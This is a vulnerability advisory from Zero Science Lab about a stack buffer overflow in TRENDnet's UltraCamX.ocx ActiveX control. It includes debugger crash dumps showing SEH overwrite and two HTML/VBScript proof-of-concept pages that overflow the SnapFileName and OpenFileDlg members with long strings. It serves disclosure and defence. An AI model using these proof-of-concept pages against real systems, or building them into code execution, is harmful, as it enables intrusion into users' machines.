TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF


Vendor: TRENDnet
Product web page: http://www.trendnet.com
Affected version: TV-IP422WN/TV-IP422W

Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful
dual-codec wireless network camera with the 2-way audio function that provides
the high-quality image and on-the-spot audio via the Internet connection.

Desc: The UltraCam ActiveX Control 'UltraCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions
in UltraCamLib, resulting in memory corruption overwriting severeal registers
including the SEH. An attacker can gain access to the system of the affected
node and execute arbitrary code.

-----------------------------------------------------------------------------

0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0          mov     ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141

-----------------------------------------------------------------------------


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5211
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5211.php


16.11.2014

---


Properties:
-----------

FileDescription		UltraCam ActiveX Control
FileVersion		1, 1, 52, 16
InternalName		UltraCamX
OriginalFileName	UltraCamX.ocx
ProductName		UltraCam device ActiveX Control
ProductVersion		1, 1, 52, 16


List of members:
----------------

Interface IUltraCamX : IDispatch
Default Interface: True
Members : 62
	RemoteHost
	RemotePort
	AccountCode
	GetConfigValue
	SetConfigValue
	SetCGIAPNAME
	Password
	UserName
	fChgImageSize
	ImgWidth
	ImgHeight
	SnapFileName
	AVIRecStart
	SetImgScale
	OpenFolder
	OpenFileDlg
	TriggerStatus
	AVIRecStatus
	Event_Frame
	PlayVideo
	SetAutoScale
	Event_Signal
	WavPlay
	CGI_ParamGet
	CGI_ParamSet
	MulticastEnable
	MulticastStatus
	SetPTUserAllow


Vulnerable members of the class:
--------------------------------

CGI_ParamSet
OpenFileDlg
SnapFileName
Password
SetCGIAPNAME
AccountCode
RemoteHost


PoC(s):
-------

<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype  = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid     = "UltraCamLib.UltraCamX"
argCount   = 1

thricer=String(8212, "A")

target.SnapFileName = thricer

</script>
</html>

--

eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4 edi=00000009
eip=1002228c esp=003befb4 ebp=003befbc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
UltraCamX!DllUnregisterServer+0x109bc:
1002228c 0fb64861        movzx   ecx,byte ptr [eax+61h]     ds:002b:414141a2=??

--


<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype  = "Function OpenFileDlg ( ByVal sFilter As String ) As String"
memberName = "OpenFileDlg"
progid     = "UltraCamLib.UltraCamX"
argCount   = 1

thricer=String(2068, "A")

target.OpenFileDlg thricer

</script>
</html>

--

0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0          mov     ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141

--